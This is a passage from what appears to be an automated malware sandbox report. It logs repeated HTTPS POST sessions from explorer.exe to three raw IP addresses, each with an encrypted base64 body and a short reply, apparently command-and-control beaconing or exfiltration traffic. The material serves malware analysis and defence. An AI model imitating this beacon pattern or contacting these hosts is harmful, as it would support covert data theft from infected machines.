                                                                              2024-07-27 12:55:32 UTC1122OUTData Raw: 57 79 61 79 6a 4d 76 6a 71 47 66 4c 71 36 2f 58 65 56 41 4c 4a 4d 4f 59 45 6a 42 56 6f 45 6b 36 44 57 36 2f 49 68 61 6b 6c 5a 42 44 7a 56 51 47 62 43 69 38 55 41 77 6c 79 41 58 47 68 69 75 59 72 48 68 69 35 4e 59 64 41 2b 5a 68 35 43 57 76 30 48 59 6f 4d 49 56 52 76 7a 4c 4a 62 39 4e 66 44 58 32 30 39 39 66 43 46 7a 78 48 41 59 65 78 45 31 55 67 6c 55 2f 30 62 4d 4d 31 56 33 35 73 54 70 42 31 70 6d 78 34 50 62 4d 57 39 74 55 30 6b 7a 43 72 70 76 6a 4d 35 55 74 61 4d 64 2f 70 38 77 53 44 4c 45 41 79 42 73 6a 55 55 79 31 63 7a 51 56 58 4f 4d 50 55 69 76 39 58 5a 78 68 30 78 4f 69 33 62 57 79 78 54 79 6f 36 4e 55 4c 48 78 57 4a 77 76 6e 42 2b 78 61 67 45 38 72 78 49 4d 56 42 37 39 59 79 69 79 64 6d 64 38 52 71 62 30 6d 30 74 43 4b 2b 4b 62 41 53 48 72 6f 4f
                                                                              Data Ascii: WyayjMvjqGfLq6/XeVALJMOYEjBVoEk6DW6/IhaklZBDzVQGbCi8UAwlyAXGhiuYrHhi5NYdA+Zh5CWv0HYoMIVRvzLJb9NfDX2099fCFzxHAYexE1UglU/0bMM1V35sTpB1pmx4PbMW9tU0kzCrpvjM5UtaMd/p8wSDLEAyBsjUUy1czQVXOMPUiv9XZxh0xOi3bWyxTyo6NULHxWJwvnB+xagE8rxIMVB79Yyiydmd8Rqb0m0tCK+KbASHroO
                                                                              2024-07-27 12:55:33 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:33 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:33 UTC685INData Raw: 73 2f 57 35 36 49 66 4e 39 69 2f 61 66 33 70 79 7a 53 4c 4a 67 70 32 7a 37 55 41 37 4c 4d 33 70 73 51 51 59 36 76 64 55 6a 6f 51 47 6b 2f 32 71 69 44 54 76 58 63 4b 58 49 4e 57 2f 46 71 76 31 38 34 4f 6d 70 52 36 78 50 47 45 62 32 37 45 70 31 52 6f 45 43 52 64 41 35 4f 62 35 4c 50 4b 74 73 64 62 63 35 65 67 72 50 65 72 2b 61 7a 61 30 79 56 4d 6d 75 63 79 44 50 5a 7a 4e 67 78 74 65 39 43 32 59 4a 68 4f 54 48 6f 68 77 67 38 73 4e 74 7a 6b 4a 65 38 73 56 6d 7a 2f 58 63 6a 43 67 33 37 6e 44 4d 33 58 55 51 6a 52 76 35 47 2b 30 43 57 6d 32 44 43 64 58 65 39 6e 6e 4f 74 35 53 6a 74 42 2f 73 38 56 36 33 58 4d 33 4c 6e 30 33 4b 2f 6f 32 56 48 5a 39 45 4e 6d 38 75 2f 67 49 63 49 63 50 36 53 4a 4d 50 75 70 5a 34 59 5a 35 69 4b 45 6e 76 45 66 53 6d 42 4c 5a 61 52 66
                                                                              Data Ascii: s/W56IfN9i/af3pyzSLJgp2z7UA7LM3psQQY6vdUjoQGk/2qiDTvXcKXINW/Fqv184OmpR6xPGEb27Ep1RoECRdA5Ob5LPKtsdbc5egrPer+aza0yVMmucyDPZzNgxte9C2YJhOTHohwg8sNtzkJe8sVmz/XcjCg37nDM3XUQjRv5G+0CWm2DCdXe9nnOt5SjtB/s8V63XM3Ln03K/o2VHZ9ENm8u/gIcIcP6SJMPupZ4YZ5iKEnvEfSmBLZaRf


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              83192.168.2.449862107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:34 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:34 UTC1267OUTData Raw: 64 4f 68 62 43 78 30 33 4a 34 4a 34 4e 56 61 54 57 41 66 36 6f 51 59 34 59 37 70 55 66 73 4b 67 61 34 76 75 56 46 4d 6d 78 49 69 70 2b 72 31 34 48 6d 75 52 4c 6a 4b 33 69 7a 37 7a 76 64 78 64 52 69 4a 4e 2b 79 5a 48 37 4c 52 43 41 4e 54 61 44 68 4d 6a 59 65 34 73 4f 2f 35 6a 44 56 44 6e 4c 33 32 6a 37 6d 54 74 6c 61 49 4d 6f 31 49 79 65 69 39 68 4b 6b 2b 31 6e 44 48 71 37 36 33 6a 33 5a 79 51 30 6e 74 51 47 6a 2f 4d 49 56 2b 70 76 6a 4e 2b 4a 52 32 49 52 36 6c 56 30 58 34 39 30 32 70 7a 55 35 32 59 72 42 6e 31 41 59 76 34 64 45 37 6a 30 52 67 6d 33 66 7a 56 2f 32 2b 58 4c 66 55 68 61 2b 4a 41 59 47 6e 4e 61 5a 46 68 49 32 49 67 50 33 4b 55 51 4f 6d 4a 59 7a 53 74 49 49 77 6e 42 6d 4d 37 79 6d 74 4d 56 31 71 2b 6e 46 76 74 6b 79 70 6a 35 75 31 43 74 65 4b
                                                                              Data Ascii: dOhbCx03J4J4NVaTWAf6oQY4Y7pUfsKga4vuVFMmxIip+r14HmuRLjK3iz7zvdxdRiJN+yZH7LRCANTaDhMjYe4sO/5jDVDnL32j7mTtlaIMo1Iyei9hKk+1nDHq763j3ZyQ0ntQGj/MIV+pvjN+JR2IR6lV0X4902pzU52YrBn1AYv4dE7j0Rgm3fzV/2+XLfUha+JAYGnNaZFhI2IgP3KUQOmJYzStIIwnBmM7ymtMV1q+nFvtkypj5u1CteK
                                                                              2024-07-27 12:55:35 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:35 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:35 UTC685INData Raw: 47 76 66 48 74 4f 69 4c 43 6a 47 63 34 34 4e 57 79 77 61 4d 70 74 67 78 61 37 69 6f 37 4b 63 58 2b 70 49 47 43 52 55 4d 6a 32 61 71 44 45 58 49 63 30 7a 7a 76 6c 5a 67 41 58 4c 4d 49 65 66 6d 44 74 57 37 2f 35 2f 39 76 49 56 31 6b 59 41 76 71 76 75 33 6a 31 51 36 6a 36 48 32 54 32 38 6c 41 79 7a 39 78 39 30 68 77 4b 48 4b 46 50 74 4e 2f 37 61 70 79 35 79 32 54 62 45 46 64 36 73 35 45 58 74 32 4d 64 68 50 46 79 51 39 61 48 51 31 48 6f 49 78 45 77 53 31 56 59 46 78 5a 67 4a 68 6b 65 33 70 4f 7a 4e 67 2f 44 45 50 53 45 44 59 6b 4e 70 57 75 2f 4b 36 36 30 49 50 41 33 44 43 43 42 55 30 51 46 54 75 56 39 4f 59 54 34 67 42 35 6a 50 58 6d 46 35 61 34 51 51 75 32 53 6b 45 31 4c 6e 4b 5a 58 61 48 51 79 4b 4e 67 44 2b 2b 42 46 45 74 70 4f 42 2f 74 38 57 45 38 6d 6b
                                                                              Data Ascii: GvfHtOiLCjGc44NWywaMptgxa7io7KcX+pIGCRUMj2aqDEXIc0zzvlZgAXLMIefmDtW7/5/9vIV1kYAvqvu3j1Q6j6H2T28lAyz9x90hwKHKFPtN/7apy5y2TbEFd6s5EXt2MdhPFyQ9aHQ1HoIxEwS1VYFxZgJhke3pOzNg/DEPSEDYkNpWu/K660IPA3DCCBU0QFTuV9OYT4gB5jPXmF5a4QQu2SkE1LnKZXaHQyKNgD++BFEtpOB/t8WE8mk


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              84192.168.2.449863107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:36 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:36 UTC1122OUTData Raw: 55 5a 44 4f 57 6c 6f 48 2b 4a 58 42 38 69 57 42 43 4a 6d 71 69 33 76 49 31 74 36 35 2b 49 37 41 68 43 75 6f 66 6e 61 48 62 31 64 55 6a 67 2f 46 38 48 2f 32 53 30 2f 50 64 65 6b 75 57 65 57 59 49 78 63 41 63 64 79 42 67 30 38 2b 62 64 32 4a 56 4d 6b 33 76 48 41 75 6a 58 47 55 67 38 62 56 63 70 30 61 70 66 30 50 35 6f 73 54 30 67 79 51 55 2f 36 76 5a 6a 63 4a 35 63 4f 44 69 76 67 76 66 31 45 4b 36 4f 62 6d 55 37 6f 70 44 5a 50 50 61 6a 2f 53 5a 69 30 43 78 37 6a 30 46 7a 74 48 34 43 47 47 53 47 7a 4d 79 56 32 50 32 32 46 72 6a 2b 63 45 6d 78 77 35 49 64 37 5a 48 35 45 57 51 50 63 35 32 34 38 4b 70 7a 53 30 70 48 31 75 4a 34 43 6a 6e 7a 7a 37 4d 50 43 37 46 30 63 32 4c 76 56 36 42 41 56 62 66 31 7a 75 30 2f 56 61 68 7a 6c 52 66 79 42 42 6e 67 78 6a 4a 64 47
                                                                              Data Ascii: UZDOWloH+JXB8iWBCJmqi3vI1t65+I7AhCuofnaHb1dUjg/F8H/2S0/PdekuWeWYIxcAcdyBg08+bd2JVMk3vHAujXGUg8bVcp0apf0P5osT0gyQU/6vZjcJ5cODivgvf1EK6ObmU7opDZPPaj/SZi0Cx7j0FztH4CGGSGzMyV2P22Frj+cEmxw5Id7ZH5EWQPc5248KpzS0pH1uJ4Cjnzz7MPC7F0c2LvV6BAVbf1zu0/VahzlRfyBBngxjJdG
                                                                              2024-07-27 12:55:37 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:37 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:37 UTC685INData Raw: 6e 6b 34 56 70 35 68 35 2f 78 68 38 67 4e 43 55 58 42 66 55 2b 30 75 64 42 46 53 77 66 61 74 35 4c 77 70 69 74 2f 41 4c 66 65 6d 62 6a 77 2f 69 7a 45 63 43 69 6b 4c 53 65 2f 6b 32 47 56 57 46 66 42 54 6c 50 76 77 7a 78 48 33 38 63 69 55 56 77 71 2f 49 6a 6c 35 54 4b 6b 59 55 31 56 47 61 54 52 48 41 74 71 75 53 6c 4c 4a 44 31 33 67 42 78 32 69 70 6c 38 4d 77 51 39 43 58 4d 36 34 35 6f 4d 6b 6f 76 66 66 74 34 48 6e 47 33 7a 65 70 39 79 68 46 75 74 39 39 38 4d 35 79 54 50 52 43 2b 57 54 56 54 79 6b 76 72 33 64 34 52 4b 53 68 76 36 37 50 55 75 42 71 49 63 2b 72 70 6a 4d 48 70 46 6d 68 4a 53 61 4e 6b 76 38 41 58 4d 6d 70 79 63 67 52 48 2b 68 69 55 38 76 6d 73 38 6d 72 56 53 34 4e 37 2f 4c 31 56 39 36 53 4d 6b 37 2f 64 76 30 33 2b 51 55 4e 33 45 79 2b 61 57 70
                                                                              Data Ascii: nk4Vp5h5/xh8gNCUXBfU+0udBFSwfat5Lwpit/ALfembjw/izEcCikLSe/k2GVWFfBTlPvwzxH38ciUVwq/Ijl5TKkYU1VGaTRHAtquSlLJD13gBx2ipl8MwQ9CXM645oMkovfft4HnG3zep9yhFut998M5yTPRC+WTVTykvr3d4RKShv67PUuBqIc+rpjMHpFmhJSaNkv8AXMmpycgRH+hiU8vms8mrVS4N7/L1V96SMk7/dv03+QUN3Ey+aWp


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              85192.168.2.449864167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:38 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:38 UTC1122OUTData Raw: 6e 61 51 4e 38 6c 53 4f 59 68 4c 64 44 31 51 6c 66 63 70 37 33 70 6c 41 6d 79 6c 32 49 77 77 56 6f 36 63 32 5a 67 66 39 52 69 52 4c 6e 65 56 6b 58 69 38 74 71 4f 78 75 6e 39 75 58 6e 67 45 48 67 61 52 42 56 36 78 6d 71 38 54 2b 37 56 56 42 72 77 47 5a 39 6d 4d 68 56 36 49 41 70 77 39 62 33 48 66 34 51 4d 67 44 30 36 58 2b 76 74 37 4c 69 39 43 71 32 79 6f 77 34 5a 73 30 57 57 70 4f 59 6d 49 69 45 52 67 37 75 5a 43 2b 6d 6f 6f 68 45 4d 49 56 71 71 44 69 57 49 38 52 62 30 51 78 48 6c 4c 48 6f 59 75 52 37 57 45 75 42 62 6f 55 6d 63 65 43 6a 4f 31 34 6c 4f 2f 51 39 39 45 6f 36 35 6f 35 63 56 77 7a 63 77 37 42 59 54 6b 53 7a 69 54 31 30 42 6a 31 48 52 48 67 42 73 52 4b 49 57 45 4c 68 65 6d 48 54 6d 57 56 50 5a 2b 4c 52 48 39 73 49 42 6d 47 4d 6b 32 4f 41 57 73
                                                                              Data Ascii: naQN8lSOYhLdD1Qlfcp73plAmyl2IwwVo6c2Zgf9RiRLneVkXi8tqOxun9uXngEHgaRBV6xmq8T+7VVBrwGZ9mMhV6IApw9b3Hf4QMgD06X+vt7Li9Cq2yow4Zs0WWpOYmIiERg7uZC+moohEMIVqqDiWI8Rb0QxHlLHoYuR7WEuBboUmceCjO14lO/Q99Eo65o5cVwzcw7BYTkSziT10Bj1HRHgBsRKIWELhemHTmWVPZ+LRH9sIBmGMk2OAWs
                                                                              2024-07-27 12:55:39 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:39 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:39 UTC685INData Raw: 62 56 65 76 41 74 4c 2f 63 4f 4c 4d 75 45 4e 63 33 74 64 79 56 6d 48 33 49 77 31 30 47 2b 52 64 43 4b 2f 39 4c 31 37 32 42 70 47 45 49 2f 62 58 52 4b 54 6f 41 53 46 79 4b 62 64 75 4c 67 77 51 69 47 44 74 72 55 6c 62 2b 71 65 70 46 52 75 79 31 75 53 39 63 39 31 78 2f 4e 76 45 72 74 69 65 66 52 67 48 44 75 70 4c 37 67 54 71 48 43 53 67 6b 4c 47 57 6f 33 67 50 35 6d 76 4a 48 76 34 69 58 2f 45 51 4f 4c 32 58 38 62 5a 2f 75 7a 58 45 6b 74 54 67 43 70 62 49 76 37 4b 63 65 71 68 32 54 67 71 42 71 6c 78 41 46 55 41 43 31 56 4d 57 65 46 46 64 76 71 6a 47 70 44 4d 61 6b 42 66 47 44 41 66 45 66 45 46 7a 52 7a 50 47 33 36 79 4d 6e 50 73 4b 49 64 41 68 2b 48 65 39 77 72 77 68 5a 32 50 73 79 75 58 4a 61 45 56 38 67 55 4d 49 37 37 2f 7a 4d 76 4e 62 66 77 39 48 43 5a 35
                                                                              Data Ascii: bVevAtL/cOLMuENc3tdyVmH3Iw10G+RdCK/9L172BpGEI/bXRKToASFyKbduLgwQiGDtrUlb+qepFRuy1uS9c91x/NvErtiefRgHDupL7gTqHCSgkLGWo3gP5mvJHv4iX/EQOL2X8bZ/uzXEktTgCpbIv7Kceqh2TgqBqlxAFUAC1VMWeFFdvqjGpDMakBfGDAfEfEFzRzPG36yMnPsKIdAh+He9wrwhZ2PsyuXJaEV8gUMI77/zMvNbfw9HCZ5


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              86192.168.2.449866107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:40 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:40 UTC1267OUTData Raw: 4b 48 6a 68 67 7a 71 5a 47 7a 54 4a 48 68 56 48 56 53 6e 69 63 65 5a 72 65 4c 50 6a 42 42 61 69 79 50 59 4d 56 36 73 4f 56 6e 35 4c 7a 47 6c 4e 48 39 45 6e 43 48 41 55 63 46 39 54 6d 35 6a 41 4e 35 2b 4c 34 6a 7a 48 71 6b 5a 59 4a 4d 63 33 48 41 6d 54 4b 74 54 59 57 71 35 32 4f 59 35 4d 6a 61 6c 58 79 49 4c 5a 38 30 6b 51 37 41 38 47 58 53 6b 55 56 2f 38 2f 62 45 7a 57 63 77 77 76 67 70 52 55 48 55 52 77 6e 75 63 72 4b 52 42 45 48 62 46 45 65 53 62 79 4c 6d 66 42 31 56 30 34 6c 46 66 4a 64 46 6e 38 4f 48 49 61 70 71 4c 36 66 6b 54 4f 51 36 6a 57 31 33 70 69 49 4f 4d 43 76 2b 79 58 51 57 44 6d 56 59 5a 68 6e 71 76 4f 32 6d 72 6c 42 63 74 72 52 42 4f 70 67 61 62 44 37 37 4f 4a 76 67 58 4d 43 47 5a 32 70 69 43 59 79 79 62 46 79 67 36 64 47 78 64 45 43 32 41
                                                                              Data Ascii: KHjhgzqZGzTJHhVHVSniceZreLPjBBaiyPYMV6sOVn5LzGlNH9EnCHAUcF9Tm5jAN5+L4jzHqkZYJMc3HAmTKtTYWq52OY5MjalXyILZ80kQ7A8GXSkUV/8/bEzWcwwvgpRUHURwnucrKRBEHbFEeSbyLmfB1V04lFfJdFn8OHIapqL6fkTOQ6jW13piIOMCv+yXQWDmVYZhnqvO2mrlBctrRBOpgabD77OJvgXMCGZ2piCYyybFyg6dGxdEC2A
                                                                              2024-07-27 12:55:41 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:41 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:41 UTC685INData Raw: 4e 44 2b 36 6d 57 58 6c 4c 35 31 4c 48 79 34 33 42 4b 38 71 6b 61 58 4f 35 59 73 66 46 68 54 6f 42 5a 32 64 34 5a 51 43 75 69 30 45 75 78 6b 4b 35 51 48 33 61 48 75 52 44 69 53 4c 52 6d 58 4d 31 43 56 64 74 4f 67 58 58 34 41 6b 78 66 2b 41 51 30 56 57 62 2f 6b 4d 6a 38 41 57 33 6a 67 6c 61 51 4d 30 67 66 64 6a 74 5a 4e 6d 66 59 44 55 49 51 32 42 46 35 33 61 36 42 6d 2b 75 48 44 2b 4d 55 66 75 64 50 56 6e 4a 32 77 65 61 63 43 5a 77 39 74 64 6f 69 78 2f 49 43 53 79 30 66 37 62 6b 6b 37 63 43 5a 61 65 50 6a 70 69 68 6b 66 55 31 70 4b 43 33 2f 65 45 50 70 48 6c 30 52 35 72 51 41 39 42 71 6b 64 4c 63 48 59 6c 45 6d 67 52 4c 71 55 4d 2b 63 43 7a 32 61 52 44 65 58 6e 47 4e 38 75 45 70 79 47 41 6d 7a 55 72 33 30 62 69 6c 66 4a 47 6f 71 4e 62 58 65 6f 55 7a 2f 37
                                                                              Data Ascii: ND+6mWXlL51LHy43BK8qkaXO5YsfFhToBZ2d4ZQCui0EuxkK5QH3aHuRDiSLRmXM1CVdtOgXX4Akxf+AQ0VWb/kMj8AW3jglaQM0gfdjtZNmfYDUIQ2BF53a6Bm+uHD+MUfudPVnJ2weacCZw9tdoix/ICSy0f7bkk7cCZaePjpihkfU1pKC3/eEPpHl0R5rQA9BqkdLcHYlEmgRLqUM+cCz2aRDeXnGN8uEpyGAmzUr30bilfJGoqNbXeoUz/7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              87192.168.2.449867107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:42 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:42 UTC1122OUTData Raw: 49 37 75 4f 38 2f 70 42 42 39 45 4e 65 50 54 2f 30 59 2f 7a 79 52 6e 72 58 2f 59 58 4f 64 47 55 36 4b 41 6d 75 6e 70 45 68 6c 62 54 36 48 2b 33 72 37 68 78 71 34 71 4b 30 32 5a 36 4f 45 70 36 48 48 78 5a 58 55 52 50 4b 6e 30 44 31 56 44 61 68 73 6c 45 36 7a 71 75 33 47 72 4b 74 72 75 78 42 62 39 65 37 2f 2f 4c 6b 43 75 68 4e 4a 32 66 33 69 4a 78 64 7a 4f 30 71 4d 78 39 50 43 48 50 6a 58 77 41 6f 2f 45 75 53 31 4c 4c 75 64 4a 47 55 57 46 6b 4f 43 5a 4a 33 4f 37 51 74 36 36 63 75 68 4d 50 55 54 55 59 6b 2f 46 32 61 6d 4e 75 56 44 42 30 43 44 6c 79 41 76 79 77 42 6b 72 2f 75 74 65 36 43 4c 47 63 6c 4f 4b 62 34 75 46 55 64 67 46 78 4d 47 42 64 38 62 75 39 6e 52 55 4d 78 33 38 4e 68 6b 56 61 51 36 61 64 57 41 5a 61 37 77 4e 4e 78 72 37 35 2b 36 35 30 69 56 4c
                                                                              Data Ascii: I7uO8/pBB9ENePT/0Y/zyRnrX/YXOdGU6KAmunpEhlbT6H+3r7hxq4qK02Z6OEp6HHxZXURPKn0D1VDahslE6zqu3GrKtruxBb9e7//LkCuhNJ2f3iJxdzO0qMx9PCHPjXwAo/EuS1LLudJGUWFkOCZJ3O7Qt66cuhMPUTUYk/F2amNuVDB0CDlyAvywBkr/ute6CLGclOKb4uFUdgFxMGBd8bu9nRUMx38NhkVaQ6adWAZa7wNNxr75+650iVL
                                                                              2024-07-27 12:55:43 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:43 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:43 UTC685INData Raw: 57 34 71 37 45 76 41 74 6b 75 5a 4a 54 49 6c 32 52 33 49 4d 61 59 5a 67 5a 36 54 6c 75 70 57 31 55 79 39 6a 55 35 2b 76 4b 52 33 50 4f 45 61 53 71 2f 49 37 75 59 2b 5a 74 70 68 2f 63 55 54 59 78 41 57 6a 75 56 71 73 42 71 48 4d 43 50 44 69 2f 6f 2f 57 73 71 4a 45 6a 66 43 62 44 54 78 57 59 62 45 30 78 37 4f 57 6a 31 53 54 65 66 56 68 65 59 48 59 6a 51 6d 72 69 45 43 48 46 44 6d 4e 61 53 4c 44 54 43 43 2b 64 54 74 75 36 6c 32 61 7a 77 45 59 47 67 48 33 6c 4d 42 51 69 31 79 50 4e 43 34 4a 63 6c 72 75 44 75 48 38 61 49 39 6d 77 36 52 52 67 69 34 49 52 6d 63 54 2f 66 78 6b 62 31 31 6b 72 36 37 6c 76 56 70 54 48 51 70 71 52 45 4a 68 54 42 44 58 66 31 42 53 43 49 41 6b 35 4f 4a 44 78 76 6b 72 63 71 37 63 68 38 33 2b 47 73 66 63 4d 72 36 34 4c 70 44 4b 65 50 42
                                                                              Data Ascii: W4q7EvAtkuZJTIl2R3IMaYZgZ6TlupW1Uy9jU5+vKR3POEaSq/I7uY+Ztph/cUTYxAWjuVqsBqHMCPDi/o/WsqJEjfCbDTxWYbE0x7OWj1STefVheYHYjQmriECHFDmNaSLDTCC+dTtu6l2azwEYGgH3lMBQi1yPNC4JclruDuH8aI9mw6RRgi4IRmcT/fxkb11kr67lvVpTHQpqREJhTBDXf1BSCIAk5OJDxvkrcq7ch83+GsfcMr64LpDKePB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              88192.168.2.449868167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:44 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:44 UTC1122OUTData Raw: 57 4a 62 4b 59 73 6b 4d 44 56 41 77 61 6f 6c 34 6a 55 36 47 65 43 49 44 6a 6d 63 78 68 51 6d 54 73 79 7a 63 6f 66 41 6c 2f 7a 6b 46 53 52 76 79 73 48 6a 41 50 73 44 36 6c 52 6b 45 48 55 47 6a 5a 6d 4e 76 63 64 6f 59 43 64 71 49 7a 52 55 78 6a 67 2f 2b 33 48 74 6f 62 72 35 7a 59 4e 30 71 48 33 58 72 67 62 52 70 51 33 4b 6c 2b 6c 41 4c 48 44 73 53 57 67 55 45 66 42 76 45 45 33 4f 63 4a 75 48 4e 6c 4f 41 55 68 2f 73 41 74 45 79 52 6e 31 42 2b 36 78 52 35 47 6e 68 6e 67 59 4d 74 76 51 34 75 79 66 64 74 4e 2b 73 41 54 4d 71 52 65 74 61 65 6b 7a 43 46 52 4d 62 55 63 66 4b 64 6b 56 6c 64 47 6f 43 31 62 62 57 54 67 46 42 53 6f 36 58 73 65 4d 58 6d 79 39 52 42 6c 6d 58 49 74 50 6d 65 37 57 4b 56 50 41 77 73 71 55 4e 6f 77 44 42 6f 37 55 32 38 76 63 32 55 42 2b 41
                                                                              Data Ascii: WJbKYskMDVAwaol4jU6GeCIDjmcxhQmTsyzcofAl/zkFSRvysHjAPsD6lRkEHUGjZmNvcdoYCdqIzRUxjg/+3Htobr5zYN0qH3XrgbRpQ3Kl+lALHDsSWgUEfBvEE3OcJuHNlOAUh/sAtEyRn1B+6xR5GnhngYMtvQ4uyfdtN+sATMqRetaekzCFRMbUcfKdkVldGoC1bbWTgFBSo6XseMXmy9RBlmXItPme7WKVPAwsqUNowDBo7U28vc2UB+A
                                                                              2024-07-27 12:55:45 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:45 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:45 UTC685INData Raw: 6d 52 6a 72 67 37 46 79 63 39 53 42 33 53 2b 6a 70 45 55 38 6a 72 68 4a 7a 6c 75 4c 6c 77 6a 51 34 6f 31 64 65 45 32 73 38 62 68 30 70 38 55 4b 50 42 6a 6a 6c 2b 75 50 55 4b 42 6d 37 51 72 72 72 70 54 76 78 6b 77 34 58 63 78 6e 66 5a 72 4b 7a 36 6a 56 62 45 67 4e 52 34 55 51 35 5a 58 67 76 76 52 71 4d 68 48 6d 33 61 35 57 55 50 63 71 77 4c 4f 44 36 43 4c 76 55 42 6d 76 30 4c 6f 39 53 37 68 68 44 6b 44 4e 53 6a 47 65 54 6b 67 4a 51 39 44 47 77 53 63 4c 2b 32 61 6f 63 4b 43 50 6f 49 73 75 50 74 57 4a 58 68 57 6b 63 56 71 4a 68 6a 42 73 39 6b 6c 77 46 49 61 6a 69 61 72 56 32 56 4e 75 32 74 31 71 53 43 66 33 50 53 50 58 6e 57 33 57 35 36 52 4c 2b 6f 73 59 56 41 64 44 37 6e 67 45 36 31 45 63 58 4f 59 62 52 31 4d 46 58 53 34 66 47 38 48 56 50 79 71 63 64 4e 75
                                                                              Data Ascii: mRjrg7Fyc9SB3S+jpEU8jrhJzluLlwjQ4o1deE2s8bh0p8UKPBjjl+uPUKBm7QrrrpTvxkw4XcxnfZrKz6jVbEgNR4UQ5ZXgvvRqMhHm3a5WUPcqwLOD6CLvUBmv0Lo9S7hhDkDNSjGeTkgJQ9DGwScL+2aocKCPoIsuPtWJXhWkcVqJhjBs9klwFIajiarV2VNu2t1qSCf3PSPXnW3W56RL+osYVAdD7ngE61EcXOYbR1MFXS4fG8HVPyqcdNu


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              89192.168.2.449870107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:46 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
